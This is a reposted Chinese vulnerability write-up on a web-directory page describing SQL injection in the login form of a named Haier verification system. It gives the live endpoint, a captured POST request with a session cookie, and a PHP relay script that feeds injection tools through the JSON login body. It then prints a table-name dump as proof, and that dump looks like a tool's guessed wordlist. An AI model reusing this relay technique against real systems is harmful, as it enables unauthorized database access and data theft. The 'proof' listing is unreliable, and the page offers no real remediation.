网站目录收录网站方式:1.人工手动审核。2.自助审核(你的网站在权重3、PR4以上,挂上本站友链->点击友链->自动审核通过。)
北京 天津 上海 广东 深圳 河北 河南 新疆 重庆 四川 贵州 湖南 湖北 云南 广西 宁夏 青海 甘肃 陕西
西藏 海南 山东 福建 安徽 浙江 吉林 山西 江西 江苏 辽宁 黑龙 内蒙 澳门 香港 台湾 日本 韩国 美国
当前位置:站长啦网站目录 » 新闻资讯 » 站长新闻 » 漏洞预警 » 文章详细 订阅RssFeed

海尔集团之14某非常重要系统很有姿势的SQL注射下载

来源:黑吧安全网 浏览:1127次 时间:2014-04-30
简介:系统地址:http://evs.haier.net/easp/uiloader/login.html海尔电子核销系统在登陆的时候,用单引号登陆,就报错了。本来以为会很简单,用一般的post注入就搞定。但是我还是太傻太天真,抓到包的那一刻我眼

系统地址:http://evs.haier.net/easp/uiloader/login.html海尔电子核销系统



在登陆的时候,用单引号登陆,就报错了。



本来以为会很简单,用一般的post注入就搞定。

但是我还是太傻太天真,抓到包的那一刻我眼泪掉下来。

 

POST http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm HTTP/1.1
Accept: */*
Referer: http://evs.haier.net/easp/uiloader/login.html
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: evs.haier.net
Content-Length: 40
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=2kpTSFLPRmJ2Fn1CYrJlD1GJjhmpVG8knMRSyMzkLRDpFM40t6L2!-881110793; cctUserId=admin; cctLocale=zh

[{"userId":"admin","password":"123456"}]





传递出去的参数是这样的啊,[{"userId":"admin","password":"123456"}],SQLmap和其他的工具根本就不认啊。但是这明显就是注入啊?



智能无奈,写一个中转php文件,大爱小学生。

 

<?php
if (empty($_GET['id'])){
echo "vip.php?id=z7ysbsbsb";
}else{
$id=$_GET['id'];
$post_data="[{\"userId\":\"$id\",\"password\":\"123456\"}]"; $url='http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm';
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
ob_start();
curl_exec($ch);
$result = ob_get_contents() ;
ob_end_clean();
echo $result;
}
?>



这里get的ID来替换掉post里面的userid参数,来实现注入。

本地访问下看看。

恩,看样子是问题不大了。

这里由于是中转注射了,本地是win的环境和php,可能检测出来跟服务器有差别。

但是呢,数据是跑不掉的。

over。

漏洞证明:

一部分数据。

 

Database: public
[206 tables]
+-------------------------------+
| Coefficients |
| DEPARTAMENTOS |
| DUMMY |
| D_PR_CUSTAS |
| EMPLOYEE |
| EPIXEIRISI |
| Enseignant |
| EventRedirect |
| Event_Category |
| FUNDGROUP |
| Film |
| Firma |
| Fusion |
| Fusion8 |
| Gruppen |
| HISTORY |
| JamPass |
| LIBRARY_BRANCH |
| LT_CUSTOM1 |
| LT_DECISAO |
| LT_ENCERRAMENTO |
| LT_EQUIPES |
| LT_OBJETO |
| LT_SERIE |
| Lieux |
| MSmerge_errorlineage |
| PROYECTO |
| Parameter |
| Pays |
| PropColumnMap |
| QRTZ_BLOB_TRIGGERS |
| QRTZ_CRON_TRIGGERS |
| QRTZ_FIRED_TRIGGERS |
| ROLE |
| SGA_XPLAN_TPL_V$SQL_PLAN_SALL |
| States |
| TBLREPORTS |
| TRABAJA_EN |
| Titres |
| WidgetDescriptions |
| _wfspro_admin |
| a_admin |
| abstract |
| admin_user |
| adminlogin |
| adminpsw |
| admuserinfo |
| articulos |
| attrs |
| auteur |
| badspy |
| bayview |
| be_groups |
| binn_maillist |
| binn_menu_tlevel |
| binn_pages |
| binn_vote_temps |
| bkp_String |
| categorie |
| cdb_bbcodes |
| cdb_itempool |
| cdb_pms |
| cdb_pmsearchindex |
| cdb_polls |
| child_configs |
| cmContentVersionDigitalAsset |
| cmRole |
| cms_member |
| cms_users |
| connections |
| contador |
| dados_estudante |
| dbstaff |
| directeur |
| dtb_mailmaga_template |
| dtb_news |
| dtb_other_deliv |
| dtb_products_class |
| egresado |
| enregistrs |
| equipment_type_seq |
| esame |
| estado |
| etudiants |
| ew_menu |
| extremes |
| f_classtype |
| feedback |
| files_config |
| forums |
| geo_Sea |
| glas |
| guava_theme_modules |
| id |
| imageCategoryList |
| individual |
| inscription |
| jos_core_acl_aro_groups |
| jos_core_log_searches |
| jos_menu_types |
| jos_messages_cfg |
| jos_preguntas |
| jos_session |
| jos_templates_menu |
| jos_vm_manufacturer_category |
| jos_vm_product_reviews |
| kpro_adminlogs |
| licenses |
| lists |
| located |
| locus_data |
| lost_pass |
| mac |
| manutencao |
| melodies |
| membres |
| mgbliuyan |
| mucRoomProp |
| mushroom_testset |
| my_lake |
| mymps_certification |
| mymps_corp |
| mymps_crons |
| mymps_navurl |
| mymps_news_img |
| mymps_telephone |
| nuke_autonews |
| nuke_banner |
| nuke_bbdisallow |
| nuke_encyclopedia_text |
| nuke_journal_comments |
| nuke_stats_year |
| oe |
| oil_bannerclient |
| oil_bfsurveypro_34 |
| oil_biolmed_entity |
| oil_biolmed_measurements |
| oil_core_acl_aro_map |
| oil_modules |
| oil_session |
| order |
| ordre |
| papers |
| passwd |
| pc |
| phpbb_config |
| platforms |
| post |
| principal |
| produits |
| pw_attachs |
| pw_config |
| pw_forums |
| pw_hack |
| radacct |
| rating_track |
| rcpt |
| register |
| registriert |
| reglement |
| rel_paper_topic |
| request |
| rss_categories |
| rss_read |
| service |
| setting |
| site_iwis |
| solicitacaosenha |
| spip_documents_rubriques |
| spip_syndic |
| spip_types_documents |
| spt_datatype_info |
| spt_provider_types |
| ssb |
| sse_familia |
| store3 |
| store4 |
| sysmaps |
| tables_priv |
| tbl_admins |
| tbl_tech |
| tblblogtrackbacks |
| tblproducts |
| tbuseraccount |
| themes |
| time_zone_transition_type |
| transfers |
| turizmi_ge |
| un |
| userInfo |
| user_connection |
| user_online_newyear |
| user_pword |
| user_uploads_pictures |
| userid |
| utilisateurs |
| valhalla |
| vars |
| vcd |
| vcd_Log |
| vendor_types |
| vendors |
| webcal_entry_ext_user |
| webcal_entry_log |
| x_world |
| zl_admin |
+-------------------------------+

 

修复方案:

0x1:注入啊注入,老是在登陆框~伤了心。

0x2:5天确认周期,完了就忽略,注意时间的掌控啊!


0

版权与免责声明:

凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;


本文地址:https://top.cnzzla.com/artinfo/871.html

好玩的手游下载

猜你喜欢

推荐站点

  • 福州小程序开发福州小程序开发

    福州好小蚁科技提供专业的微信小程序开发、软件定制、手机APP开发、网站开发等高端定制外包服务,价格美丽,服务周到.一对一项目对接,不满意退全款!预约电话:13107632710 胡小春!福州好小蚁科技有限公司是福建福州网站app等技术开发优秀网络公司。

    www.fzant.com
  • 世界时间网世界时间网

    世界时间网为您提供世界各地精准时间,北京时间校准器,标准时间,世界各地时间与北京时间对比,时间换算等,希望对您有所帮助。

    top.cnzzla.com/time
  • 科技镇科技镇

    科技镇 | 关注科技、娱乐、人文、生活!

    www.kejizhen.com
  • 心动网址导航心动网址导航

    心动网址导航精选了国内国外著名的网站、好玩的、好看的、有趣的国内国外网站以及实用的、优秀的国内国外网站,包括国外视频、国外购物、国外交友、国外新闻等多种类型 同时提供精品行业分类目录提交,让用户全方位了解国内国外互联网动态!

    xd00.com
  • 门户网址-优秀网站导航门户网址-优秀网站导航

    门户网址-优秀网站导航,精选网址导航,免费分类目录提交,实用酷站大全。

    top.mhwz.cn

最新优秀网站